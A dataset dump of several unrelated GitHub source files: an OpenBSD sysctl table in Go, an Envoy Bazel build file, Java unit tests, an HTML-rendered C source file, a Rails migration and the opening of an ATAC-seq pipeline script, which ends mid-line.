text
stringlengths
2
100k
meta
dict
// mksysctl_openbsd.pl // MACHINE GENERATED BY THE ABOVE COMMAND; DO NOT EDIT package unix type mibentry struct { ctlname string ctloid []_C_int } var sysctlMib = []mibentry{ {"ddb.console", []_C_int{9, 6}}, {"ddb.log", []_C_int{9, 7}}, {"ddb.max_line", []_C_int{9, 3}}, {"ddb.max_width", []_C_int{9, 2}}, {"ddb.panic", []_C_int{9, 5}}, {"ddb.radix", []_C_int{9, 1}}, {"ddb.tab_stop_width", []_C_int{9, 4}}, {"ddb.trigger", []_C_int{9, 8}}, {"fs.posix.setuid", []_C_int{3, 1, 1}}, {"hw.allowpowerdown", []_C_int{6, 22}}, {"hw.byteorder", []_C_int{6, 4}}, {"hw.cpuspeed", []_C_int{6, 12}}, {"hw.diskcount", []_C_int{6, 10}}, {"hw.disknames", []_C_int{6, 8}}, {"hw.diskstats", []_C_int{6, 9}}, {"hw.machine", []_C_int{6, 1}}, {"hw.model", []_C_int{6, 2}}, {"hw.ncpu", []_C_int{6, 3}}, {"hw.ncpufound", []_C_int{6, 21}}, {"hw.pagesize", []_C_int{6, 7}}, {"hw.physmem", []_C_int{6, 19}}, {"hw.product", []_C_int{6, 15}}, {"hw.serialno", []_C_int{6, 17}}, {"hw.setperf", []_C_int{6, 13}}, {"hw.usermem", []_C_int{6, 20}}, {"hw.uuid", []_C_int{6, 18}}, {"hw.vendor", []_C_int{6, 14}}, {"hw.version", []_C_int{6, 16}}, {"kern.arandom", []_C_int{1, 37}}, {"kern.argmax", []_C_int{1, 8}}, {"kern.boottime", []_C_int{1, 21}}, {"kern.bufcachepercent", []_C_int{1, 72}}, {"kern.ccpu", []_C_int{1, 45}}, {"kern.clockrate", []_C_int{1, 12}}, {"kern.consdev", []_C_int{1, 75}}, {"kern.cp_time", []_C_int{1, 40}}, {"kern.cp_time2", []_C_int{1, 71}}, {"kern.cryptodevallowsoft", []_C_int{1, 53}}, {"kern.domainname", []_C_int{1, 22}}, {"kern.file", []_C_int{1, 73}}, {"kern.forkstat", []_C_int{1, 42}}, {"kern.fscale", []_C_int{1, 46}}, {"kern.fsync", []_C_int{1, 33}}, {"kern.hostid", []_C_int{1, 11}}, {"kern.hostname", []_C_int{1, 10}}, {"kern.intrcnt.nintrcnt", []_C_int{1, 63, 1}}, {"kern.job_control", []_C_int{1, 19}}, {"kern.malloc.buckets", []_C_int{1, 39, 1}}, {"kern.malloc.kmemnames", []_C_int{1, 39, 3}}, {"kern.maxclusters", []_C_int{1, 67}}, {"kern.maxfiles", []_C_int{1, 7}}, {"kern.maxlocksperuid", []_C_int{1, 70}}, {"kern.maxpartitions", []_C_int{1, 23}}, {"kern.maxproc", []_C_int{1, 6}}, {"kern.maxthread", []_C_int{1, 25}}, {"kern.maxvnodes", []_C_int{1, 5}}, {"kern.mbstat", []_C_int{1, 59}}, {"kern.msgbuf", []_C_int{1, 48}}, {"kern.msgbufsize", []_C_int{1, 38}}, {"kern.nchstats", []_C_int{1, 41}}, {"kern.netlivelocks", []_C_int{1, 76}}, {"kern.nfiles", []_C_int{1, 56}}, {"kern.ngroups", []_C_int{1, 18}}, {"kern.nosuidcoredump", []_C_int{1, 32}}, {"kern.nprocs", []_C_int{1, 47}}, {"kern.nselcoll", []_C_int{1, 43}}, {"kern.nthreads", []_C_int{1, 26}}, {"kern.numvnodes", []_C_int{1, 58}}, {"kern.osrelease", []_C_int{1, 2}}, {"kern.osrevision", []_C_int{1, 3}}, {"kern.ostype", []_C_int{1, 1}}, {"kern.osversion", []_C_int{1, 27}}, {"kern.pool_debug", []_C_int{1, 77}}, {"kern.posix1version", []_C_int{1, 17}}, {"kern.proc", []_C_int{1, 66}}, {"kern.random", []_C_int{1, 31}}, {"kern.rawpartition", []_C_int{1, 24}}, {"kern.saved_ids", []_C_int{1, 20}}, {"kern.securelevel", []_C_int{1, 9}}, {"kern.seminfo", []_C_int{1, 61}}, {"kern.shminfo", []_C_int{1, 62}}, {"kern.somaxconn", []_C_int{1, 28}}, {"kern.sominconn", []_C_int{1, 29}}, {"kern.splassert", []_C_int{1, 54}}, {"kern.stackgap_random", []_C_int{1, 50}}, {"kern.sysvipc_info", []_C_int{1, 51}}, {"kern.sysvmsg", []_C_int{1, 34}}, {"kern.sysvsem", []_C_int{1, 35}}, {"kern.sysvshm", []_C_int{1, 36}}, {"kern.timecounter.choice", []_C_int{1, 69, 4}}, {"kern.timecounter.hardware", []_C_int{1, 69, 3}}, {"kern.timecounter.tick", []_C_int{1, 69, 1}}, {"kern.timecounter.timestepwarnings", []_C_int{1, 69, 2}}, {"kern.tty.maxptys", []_C_int{1, 44, 6}}, {"kern.tty.nptys", []_C_int{1, 44, 7}}, {"kern.tty.tk_cancc", []_C_int{1, 44, 4}}, {"kern.tty.tk_nin", []_C_int{1, 44, 1}}, {"kern.tty.tk_nout", []_C_int{1, 44, 2}}, {"kern.tty.tk_rawcc", []_C_int{1, 44, 3}}, {"kern.tty.ttyinfo", []_C_int{1, 44, 5}}, {"kern.ttycount", []_C_int{1, 57}}, {"kern.userasymcrypto", []_C_int{1, 60}}, {"kern.usercrypto", []_C_int{1, 52}}, {"kern.usermount", []_C_int{1, 30}}, {"kern.version", []_C_int{1, 4}}, {"kern.vnode", []_C_int{1, 13}}, {"kern.watchdog.auto", []_C_int{1, 64, 2}}, {"kern.watchdog.period", []_C_int{1, 64, 1}}, {"net.bpf.bufsize", []_C_int{4, 31, 1}}, {"net.bpf.maxbufsize", []_C_int{4, 31, 2}}, {"net.inet.ah.enable", []_C_int{4, 2, 51, 1}}, {"net.inet.ah.stats", []_C_int{4, 2, 51, 2}}, {"net.inet.carp.allow", []_C_int{4, 2, 112, 1}}, {"net.inet.carp.log", []_C_int{4, 2, 112, 3}}, {"net.inet.carp.preempt", []_C_int{4, 2, 112, 2}}, {"net.inet.carp.stats", []_C_int{4, 2, 112, 4}}, {"net.inet.divert.recvspace", []_C_int{4, 2, 258, 1}}, {"net.inet.divert.sendspace", []_C_int{4, 2, 258, 2}}, {"net.inet.divert.stats", []_C_int{4, 2, 258, 3}}, {"net.inet.esp.enable", []_C_int{4, 2, 50, 1}}, {"net.inet.esp.stats", []_C_int{4, 2, 50, 4}}, {"net.inet.esp.udpencap", []_C_int{4, 2, 50, 2}}, {"net.inet.esp.udpencap_port", []_C_int{4, 2, 50, 3}}, {"net.inet.etherip.allow", []_C_int{4, 2, 97, 1}}, {"net.inet.etherip.stats", []_C_int{4, 2, 97, 2}}, {"net.inet.gre.allow", []_C_int{4, 2, 47, 1}}, {"net.inet.gre.wccp", []_C_int{4, 2, 47, 2}}, {"net.inet.icmp.bmcastecho", []_C_int{4, 2, 1, 2}}, {"net.inet.icmp.errppslimit", []_C_int{4, 2, 1, 3}}, {"net.inet.icmp.maskrepl", []_C_int{4, 2, 1, 1}}, {"net.inet.icmp.rediraccept", []_C_int{4, 2, 1, 4}}, {"net.inet.icmp.redirtimeout", []_C_int{4, 2, 1, 5}}, {"net.inet.icmp.stats", []_C_int{4, 2, 1, 7}}, {"net.inet.icmp.tstamprepl", []_C_int{4, 2, 1, 6}}, {"net.inet.igmp.stats", []_C_int{4, 2, 2, 1}}, {"net.inet.ip.arpqueued", []_C_int{4, 2, 0, 36}}, {"net.inet.ip.encdebug", []_C_int{4, 2, 0, 12}}, {"net.inet.ip.forwarding", []_C_int{4, 2, 0, 1}}, {"net.inet.ip.ifq.congestion", []_C_int{4, 2, 0, 30, 4}}, {"net.inet.ip.ifq.drops", []_C_int{4, 2, 0, 30, 3}}, {"net.inet.ip.ifq.len", []_C_int{4, 2, 0, 30, 1}}, {"net.inet.ip.ifq.maxlen", []_C_int{4, 2, 0, 30, 2}}, {"net.inet.ip.maxqueue", []_C_int{4, 2, 0, 11}}, {"net.inet.ip.mforwarding", []_C_int{4, 2, 0, 31}}, {"net.inet.ip.mrtproto", []_C_int{4, 2, 0, 34}}, {"net.inet.ip.mrtstats", []_C_int{4, 2, 0, 35}}, {"net.inet.ip.mtu", []_C_int{4, 2, 0, 4}}, {"net.inet.ip.mtudisc", []_C_int{4, 2, 0, 27}}, {"net.inet.ip.mtudisctimeout", []_C_int{4, 2, 0, 28}}, {"net.inet.ip.multipath", []_C_int{4, 2, 0, 32}}, {"net.inet.ip.portfirst", []_C_int{4, 2, 0, 7}}, {"net.inet.ip.porthifirst", []_C_int{4, 2, 0, 9}}, {"net.inet.ip.porthilast", []_C_int{4, 2, 0, 10}}, {"net.inet.ip.portlast", []_C_int{4, 2, 0, 8}}, {"net.inet.ip.redirect", []_C_int{4, 2, 0, 2}}, {"net.inet.ip.sourceroute", []_C_int{4, 2, 0, 5}}, {"net.inet.ip.stats", []_C_int{4, 2, 0, 33}}, {"net.inet.ip.ttl", []_C_int{4, 2, 0, 3}}, {"net.inet.ipcomp.enable", []_C_int{4, 2, 108, 1}}, {"net.inet.ipcomp.stats", []_C_int{4, 2, 108, 2}}, {"net.inet.ipip.allow", []_C_int{4, 2, 4, 1}}, {"net.inet.ipip.stats", []_C_int{4, 2, 4, 2}}, {"net.inet.mobileip.allow", []_C_int{4, 2, 55, 1}}, {"net.inet.pfsync.stats", []_C_int{4, 2, 240, 1}}, {"net.inet.pim.stats", []_C_int{4, 2, 103, 1}}, {"net.inet.tcp.ackonpush", []_C_int{4, 2, 6, 13}}, {"net.inet.tcp.always_keepalive", []_C_int{4, 2, 6, 22}}, {"net.inet.tcp.baddynamic", []_C_int{4, 2, 6, 6}}, {"net.inet.tcp.drop", []_C_int{4, 2, 6, 19}}, {"net.inet.tcp.ecn", []_C_int{4, 2, 6, 14}}, {"net.inet.tcp.ident", []_C_int{4, 2, 6, 9}}, {"net.inet.tcp.keepidle", []_C_int{4, 2, 6, 3}}, {"net.inet.tcp.keepinittime", []_C_int{4, 2, 6, 2}}, {"net.inet.tcp.keepintvl", []_C_int{4, 2, 6, 4}}, {"net.inet.tcp.mssdflt", []_C_int{4, 2, 6, 11}}, {"net.inet.tcp.reasslimit", []_C_int{4, 2, 6, 18}}, {"net.inet.tcp.rfc1323", []_C_int{4, 2, 6, 1}}, {"net.inet.tcp.rfc3390", []_C_int{4, 2, 6, 17}}, {"net.inet.tcp.rstppslimit", []_C_int{4, 2, 6, 12}}, {"net.inet.tcp.sack", []_C_int{4, 2, 6, 10}}, {"net.inet.tcp.sackholelimit", []_C_int{4, 2, 6, 20}}, {"net.inet.tcp.slowhz", []_C_int{4, 2, 6, 5}}, {"net.inet.tcp.stats", []_C_int{4, 2, 6, 21}}, {"net.inet.tcp.synbucketlimit", []_C_int{4, 2, 6, 16}}, {"net.inet.tcp.syncachelimit", []_C_int{4, 2, 6, 15}}, {"net.inet.udp.baddynamic", []_C_int{4, 2, 17, 2}}, {"net.inet.udp.checksum", []_C_int{4, 2, 17, 1}}, {"net.inet.udp.recvspace", []_C_int{4, 2, 17, 3}}, {"net.inet.udp.sendspace", []_C_int{4, 2, 17, 4}}, {"net.inet.udp.stats", []_C_int{4, 2, 17, 5}}, {"net.inet6.divert.recvspace", []_C_int{4, 24, 86, 1}}, {"net.inet6.divert.sendspace", []_C_int{4, 24, 86, 2}}, {"net.inet6.divert.stats", []_C_int{4, 24, 86, 3}}, {"net.inet6.icmp6.errppslimit", []_C_int{4, 24, 30, 14}}, {"net.inet6.icmp6.mtudisc_hiwat", []_C_int{4, 24, 30, 16}}, {"net.inet6.icmp6.mtudisc_lowat", []_C_int{4, 24, 30, 17}}, {"net.inet6.icmp6.nd6_debug", []_C_int{4, 24, 30, 18}}, {"net.inet6.icmp6.nd6_delay", []_C_int{4, 24, 30, 8}}, {"net.inet6.icmp6.nd6_maxnudhint", []_C_int{4, 24, 30, 15}}, {"net.inet6.icmp6.nd6_mmaxtries", []_C_int{4, 24, 30, 10}}, {"net.inet6.icmp6.nd6_prune", []_C_int{4, 24, 30, 6}}, {"net.inet6.icmp6.nd6_umaxtries", []_C_int{4, 24, 30, 9}}, {"net.inet6.icmp6.nd6_useloopback", []_C_int{4, 24, 30, 11}}, {"net.inet6.icmp6.nodeinfo", []_C_int{4, 24, 30, 13}}, {"net.inet6.icmp6.rediraccept", []_C_int{4, 24, 30, 2}}, {"net.inet6.icmp6.redirtimeout", []_C_int{4, 24, 30, 3}}, {"net.inet6.ip6.accept_rtadv", []_C_int{4, 24, 17, 12}}, {"net.inet6.ip6.auto_flowlabel", []_C_int{4, 24, 17, 17}}, {"net.inet6.ip6.dad_count", []_C_int{4, 24, 17, 16}}, {"net.inet6.ip6.dad_pending", []_C_int{4, 24, 17, 49}}, {"net.inet6.ip6.defmcasthlim", []_C_int{4, 24, 17, 18}}, {"net.inet6.ip6.forwarding", []_C_int{4, 24, 17, 1}}, {"net.inet6.ip6.forwsrcrt", []_C_int{4, 24, 17, 5}}, {"net.inet6.ip6.hdrnestlimit", []_C_int{4, 24, 17, 15}}, {"net.inet6.ip6.hlim", []_C_int{4, 24, 17, 3}}, {"net.inet6.ip6.log_interval", []_C_int{4, 24, 17, 14}}, {"net.inet6.ip6.maxdynroutes", []_C_int{4, 24, 17, 48}}, {"net.inet6.ip6.maxfragpackets", []_C_int{4, 24, 17, 9}}, {"net.inet6.ip6.maxfrags", []_C_int{4, 24, 17, 41}}, {"net.inet6.ip6.maxifdefrouters", []_C_int{4, 24, 17, 47}}, {"net.inet6.ip6.maxifprefixes", []_C_int{4, 24, 17, 46}}, {"net.inet6.ip6.mforwarding", []_C_int{4, 24, 17, 42}}, {"net.inet6.ip6.mrtproto", []_C_int{4, 24, 17, 8}}, {"net.inet6.ip6.mtudisctimeout", []_C_int{4, 24, 17, 50}}, {"net.inet6.ip6.multicast_mtudisc", []_C_int{4, 24, 17, 44}}, {"net.inet6.ip6.multipath", []_C_int{4, 24, 17, 43}}, {"net.inet6.ip6.neighborgcthresh", []_C_int{4, 24, 17, 45}}, {"net.inet6.ip6.redirect", []_C_int{4, 24, 17, 2}}, {"net.inet6.ip6.rr_prune", []_C_int{4, 24, 17, 22}}, {"net.inet6.ip6.sourcecheck", []_C_int{4, 24, 17, 10}}, {"net.inet6.ip6.sourcecheck_logint", []_C_int{4, 24, 17, 11}}, {"net.inet6.ip6.use_deprecated", []_C_int{4, 24, 17, 21}}, {"net.inet6.ip6.v6only", []_C_int{4, 24, 17, 24}}, {"net.key.sadb_dump", []_C_int{4, 30, 1}}, {"net.key.spd_dump", []_C_int{4, 30, 2}}, {"net.mpls.ifq.congestion", []_C_int{4, 33, 3, 4}}, {"net.mpls.ifq.drops", []_C_int{4, 33, 3, 3}}, {"net.mpls.ifq.len", []_C_int{4, 33, 3, 1}}, {"net.mpls.ifq.maxlen", []_C_int{4, 33, 3, 2}}, {"net.mpls.mapttl_ip", []_C_int{4, 33, 5}}, {"net.mpls.mapttl_ip6", []_C_int{4, 33, 6}}, {"net.mpls.maxloop_inkernel", []_C_int{4, 33, 4}}, {"net.mpls.ttl", []_C_int{4, 33, 2}}, {"net.pflow.stats", []_C_int{4, 34, 1}}, {"net.pipex.enable", []_C_int{4, 35, 1}}, {"vm.anonmin", []_C_int{2, 7}}, {"vm.loadavg", []_C_int{2, 2}}, {"vm.maxslp", []_C_int{2, 10}}, {"vm.nkmempages", []_C_int{2, 6}}, {"vm.psstrings", []_C_int{2, 3}}, {"vm.swapencrypt.enable", []_C_int{2, 5, 0}}, {"vm.swapencrypt.keyscreated", []_C_int{2, 5, 1}}, {"vm.swapencrypt.keysdeleted", []_C_int{2, 5, 2}}, {"vm.uspace", []_C_int{2, 11}}, {"vm.uvmexp", []_C_int{2, 4}}, {"vm.vmmeter", []_C_int{2, 1}}, {"vm.vnodemin", []_C_int{2, 9}}, {"vm.vtextmin", []_C_int{2, 8}}, }
{ "pile_set_name": "Github" }
load( "//bazel:envoy_build_system.bzl", "envoy_cc_mock", "envoy_package", ) load( "//test/extensions:extensions_build_system.bzl", "envoy_extension_benchmark_test", "envoy_extension_cc_benchmark_binary", "envoy_extension_cc_test", ) licenses(["notice"]) # Apache 2 envoy_package() envoy_extension_cc_test( name = "command_splitter_impl_test", srcs = ["command_splitter_impl_test.cc"], extension_name = "envoy.filters.network.redis_proxy", # This test takes a while to run specially under tsan. # Shard it to avoid test timeout. shard_count = 2, deps = [ ":redis_mocks", "//source/common/stats:isolated_store_lib", "//source/common/stats:stats_lib", "//source/extensions/filters/network/common/redis:fault_lib", "//source/extensions/filters/network/redis_proxy:command_splitter_lib", "//source/extensions/filters/network/redis_proxy:router_interface", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/mocks:common_lib", "//test/mocks/event:event_mocks", "//test/mocks/stats:stats_mocks", "//test/test_common:simulated_time_system_lib", "//test/test_common:test_runtime_lib", ], ) envoy_extension_cc_test( name = "conn_pool_impl_test", srcs = ["conn_pool_impl_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ ":redis_mocks", "//source/common/event:dispatcher_lib", "//source/common/network:utility_lib", "//source/common/upstream:upstream_includes", "//source/common/upstream:upstream_lib", "//source/extensions/filters/network/common/redis:utility_lib", "//source/extensions/filters/network/redis_proxy:conn_pool_lib", "//test/extensions/clusters/redis:redis_cluster_mocks", "//test/extensions/common/redis:mocks_lib", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/extensions/filters/network/common/redis:test_utils_lib", "//test/mocks/api:api_mocks", "//test/mocks/network:network_mocks", "//test/mocks/thread_local:thread_local_mocks", "//test/mocks/upstream:cluster_manager_mocks", "//test/mocks/upstream:cluster_mocks", "//test/mocks/upstream:cluster_update_callbacks_handle_mocks", "//test/mocks/upstream:cluster_update_callbacks_mocks", "//test/mocks/upstream:host_mocks", "//test/mocks/upstream:host_set_mocks", "//test/mocks/upstream:thread_local_cluster_mocks", "@envoy_api//envoy/config/cluster/redis:pkg_cc_proto", "@envoy_api//envoy/config/cluster/v3:pkg_cc_proto", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", ], ) envoy_extension_cc_test( name = "proxy_filter_test", srcs = ["proxy_filter_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ ":redis_mocks", "//source/common/event:dispatcher_lib", "//source/extensions/filters/network/redis_proxy:proxy_filter_lib", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/mocks:common_lib", "//test/mocks/api:api_mocks", "//test/mocks/network:network_mocks", "//test/test_common:utility_lib", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", ], ) envoy_cc_mock( name = "redis_mocks", srcs = ["mocks.cc"], hdrs = ["mocks.h"], deps = [ "//source/common/common:assert_lib", "//source/extensions/common/redis:cluster_refresh_manager_interface", "//source/extensions/filters/network/common/redis:client_interface", "//source/extensions/filters/network/common/redis:codec_lib", "//source/extensions/filters/network/common/redis:fault_interface", "//source/extensions/filters/network/redis_proxy:command_splitter_interface", "//source/extensions/filters/network/redis_proxy:conn_pool_interface", "//source/extensions/filters/network/redis_proxy:router_interface", ], ) envoy_extension_cc_test( name = "config_test", srcs = ["config_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ "//source/common/protobuf:utility_lib", "//source/extensions/filters/network/redis_proxy:config", "//test/mocks/server:factory_context_mocks", "//test/test_common:test_runtime_lib", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", ], ) envoy_extension_cc_benchmark_binary( name = "command_lookup_speed_test", srcs = ["command_lookup_speed_test.cc"], extension_name = "envoy.filters.network.redis_proxy", external_deps = [ "benchmark", ], deps = [ ":redis_mocks", "//source/common/stats:isolated_store_lib", "//source/common/stats:stats_lib", "//source/extensions/filters/network/redis_proxy:command_splitter_lib", "//test/mocks/event:event_mocks", "//test/test_common:printers_lib", "//test/test_common:simulated_time_system_lib", ], ) envoy_extension_benchmark_test( name = "command_lookup_speed_test_benchmark_test", benchmark_binary = "command_lookup_speed_test", extension_name = "envoy.filters.network.redis_proxy", ) envoy_extension_cc_test( name = "router_impl_test", srcs = ["router_impl_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ ":redis_mocks", "//source/extensions/filters/network/redis_proxy:router_lib", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/mocks/runtime:runtime_mocks", "//test/test_common:utility_lib", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", "@envoy_api//envoy/type/v3:pkg_cc_proto", ], ) envoy_extension_cc_test( name = "redis_proxy_integration_test", srcs = ["redis_proxy_integration_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ "//source/extensions/filters/network/common/redis:fault_lib", "//source/extensions/filters/network/redis_proxy:config", "//test/integration:integration_lib", ], ) envoy_extension_cc_benchmark_binary( name = "command_split_speed_test", srcs = ["command_split_speed_test.cc"], extension_name = "envoy.filters.network.redis_proxy", external_deps = [ "benchmark", ], deps = [ ":redis_mocks", "//source/common/stats:isolated_store_lib", "//source/common/stats:stats_lib", "//source/extensions/filters/network/redis_proxy:command_splitter_lib", "//source/extensions/filters/network/redis_proxy:router_lib", "//test/test_common:printers_lib", "//test/test_common:simulated_time_system_lib", ], ) envoy_extension_benchmark_test( name = "command_split_speed_test_benchmark_test", benchmark_binary = "command_split_speed_test", extension_name = "envoy.filters.network.redis_proxy", )
{ "pile_set_name": "Github" }
/* * Copyright (c) 2015 Goldman Sachs. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * and Eclipse Distribution License v. 1.0 which accompany this distribution. * The Eclipse Public License is available at http://www.eclipse.org/legal/epl-v10.html * and the Eclipse Distribution License is available at * http://www.eclipse.org/org/documents/edl-v10.php. */ package org.eclipse.collections.impl.map.mutable.primitive; import org.eclipse.collections.impl.test.Verify; import org.junit.Test; public class UnmodifiableShortShortMapSerializationTest { @Test public void serializedForm() { Verify.assertSerializedForm( 1L, "rO0ABXNyAExvcmcuZWNsaXBzZS5jb2xsZWN0aW9ucy5pbXBsLm1hcC5tdXRhYmxlLnByaW1pdGl2\n" + "ZS5Vbm1vZGlmaWFibGVTaG9ydFNob3J0TWFwAAAAAAAAAAECAAFMAANtYXB0AEBMb3JnL2VjbGlw\n" + "c2UvY29sbGVjdGlvbnMvYXBpL21hcC9wcmltaXRpdmUvTXV0YWJsZVNob3J0U2hvcnRNYXA7eHBz\n" + "cgBEb3JnLmVjbGlwc2UuY29sbGVjdGlvbnMuaW1wbC5tYXAubXV0YWJsZS5wcmltaXRpdmUuU2hv\n" + "cnRTaG9ydEhhc2hNYXAAAAAAAAAAAQwAAHhwdwQAAAAAeA==", new UnmodifiableShortShortMap(new ShortShortHashMap())); } @Test public void keySetSerializedForm() { Verify.assertSerializedForm( 1L, "rO0ABXNyAEdvcmcuZWNsaXBzZS5jb2xsZWN0aW9ucy5pbXBsLnNldC5tdXRhYmxlLnByaW1pdGl2\n" + "ZS5Vbm1vZGlmaWFibGVTaG9ydFNldAAAAAAAAAABAgAAeHIAXW9yZy5lY2xpcHNlLmNvbGxlY3Rp\n" + "b25zLmltcGwuY29sbGVjdGlvbi5tdXRhYmxlLnByaW1pdGl2ZS5BYnN0cmFjdFVubW9kaWZpYWJs\n" + "ZVNob3J0Q29sbGVjdGlvbgAAAAAAAAABAgABTAAKY29sbGVjdGlvbnQASUxvcmcvZWNsaXBzZS9j\n" + "b2xsZWN0aW9ucy9hcGkvY29sbGVjdGlvbi9wcmltaXRpdmUvTXV0YWJsZVNob3J0Q29sbGVjdGlv\n" + "bjt4cHNyAFRvcmcuZWNsaXBzZS5jb2xsZWN0aW9ucy5pbXBsLm1hcC5tdXRhYmxlLnByaW1pdGl2\n" + "ZS5BYnN0cmFjdE11dGFibGVTaG9ydEtleVNldCRTZXJSZXAAAAAAAAAAAQwAAHhwdwQAAAAAeA==\n", new UnmodifiableShortShortMap(new ShortShortHashMap()).keySet()); } }
{ "pile_set_name": "Github" }
<?xml version='1.0' encoding='iso-8859-1'?> <!doctype html public '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'> <html xmlns='http://www.w3c.org/1999/xhtml' lang='en-us'> <head> <title> StationRole.c </title> <meta http-equiv='content-type' content='text/html;iso-8859-1'/> <meta name='generator' content='motley-tools 1.9.4 13:40:33 Feb 18 2015'/> <meta name='author' content='[email protected]'/> <meta name='robots' content='noindex,nofollow'/> <link href='toolkit.css' rel='stylesheet' type='text/css'/> </head> <body> <div class='headerlink'> [<a href='StartFirmware.c.html' title=' StartFirmware.c '>PREV</a>] [<a href='toolkit.html' title=' Index '>HOME</a>] [<a href='strdecr.c.html' title=' strdecr.c '>NEXT</a>] </div> <pre> /*====================================================================* * * Copyright (c) 2013 Qualcomm Atheros, Inc. * * All rights reserved. * * Redistribution and use in source and binary forms, with or * without modification, are permitted (subject to the limitations * in the disclaimer below) provided that the following conditions * are met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimer in the documentation and/or other materials * provided with the distribution. * * * Neither the name of Qualcomm Atheros nor the names of * its contributors may be used to endorse or promote products * derived from this software without specific prior written * permission. * * NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE * GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE * COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * *--------------------------------------------------------------------*/ /*====================================================================* * * StationRole.c - Station Role Strings; * * plc.h * *--------------------------------------------------------------------*/ #ifndef STATIONROLE_SOURCE #define STATIONROLE_SOURCE #include &quot;../plc/plc.h&quot; char const * StationRole [] = { &quot;STA&quot;, &quot;PCO&quot;, &quot;CCO&quot; }; #endif </pre> <div class='footerlink'> [<a href='StartFirmware.c.html' title=' StartFirmware.c '>PREV</a>] [<a href='toolkit.html' title=' Index '>HOME</a>] [<a href='strdecr.c.html' title=' strdecr.c '>NEXT</a>] </div> </body> </html>
{ "pile_set_name": "Github" }
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.waveprotocol.wave.client.wavepanel.view; import junit.framework.TestCase; import java.util.ArrayList; import java.util.HashSet; import java.util.Random; public class ModelIdMapperImplTest extends TestCase { public void testMapping() throws Exception { ModelIdMapperImpl impl = ModelIdMapperImpl.create(null, "empty"); verifyMapper(impl); } private void verifyMapper(ModelIdMapperImpl impl) { HashSet<String> shortIdSet = new HashSet<String>(); HashSet<String> longIdSet = new HashSet<String>(); ArrayList<String> shortIds = new ArrayList<String>(); ArrayList<String> longIds = new ArrayList<String>(); Random random = new Random(); // ensure unique while (longIdSet.size() < 100) { String longId = Integer.toBinaryString(random.nextInt()); while (longIdSet.contains(longId)) { longId = Integer.toBinaryString(random.nextInt()); } longIdSet.add(longId); String shortId = impl.shorten(longId); assertFalse("Short Id is already in the set " + shortId + " set " + shortIdSet, shortIdSet .contains(shortId)); shortIdSet.add(shortId); shortIds.add(shortId); longIds.add(longId); } for (int i = 0; i < shortIds.size(); i++) { assertEquals("The shortId returned for repeated longId is not the same", shortIds.get(i), impl.shorten(longIds.get(i))); assertEquals("Restoring of the shortIds is not the same as long id", longIds.get(i), impl .restoreId(shortIds.get(i))); } } public void testCorrectForm() { ModelIdMapperImpl impl = new ModelIdMapperImpl(null, "empty", 42); assertEquals("Next id not of expected form", "empty42", impl.shorten("1234")); verifyMapper(impl); } }
{ "pile_set_name": "Github" }
class CreateCountries < ActiveRecord::Migration[4.2] def change create_table :countries do |t| t.string :name t.timestamps end end end
{ "pile_set_name": "Github" }
#!/usr/bin/env bds #vim: syntax=java help == atac pipeline settings type := "atac-seq" help Type of the pipeline. atac-seq or dnase-seq (default: atac-seq). dnase_seq := false help DNase-Seq (no tn5 shifting). align := false help Align only (no MACS2 peak calling or IDR or ataqc analysis). subsample_xcor := "25M" help # reads to subsample for cross corr. analysis (default: 25M). subsample := "0" help # reads to subsample exp. replicates. Subsampled tagalign will be used for steps downstream (default: 0; no subsampling). true_rep := false help No pseudo-replicates. no_ataqc := false help No ATAQC no_xcor := false help No Cross-correlation analysis. csem := false help Use CSEM for alignment. smooth_win := "150" help Smoothing window size for MACS2 peak calling (default: 150). idr_thresh := 0.1 help IDR threshold : -log_10(score) (default: 0.1). ENCODE3 := false help Force to use parameter set (-smooth_win 73 -idr_thresh 0.05 -multimapping 4) for ENCODE3. ENCODE := false help Force to use parameter set 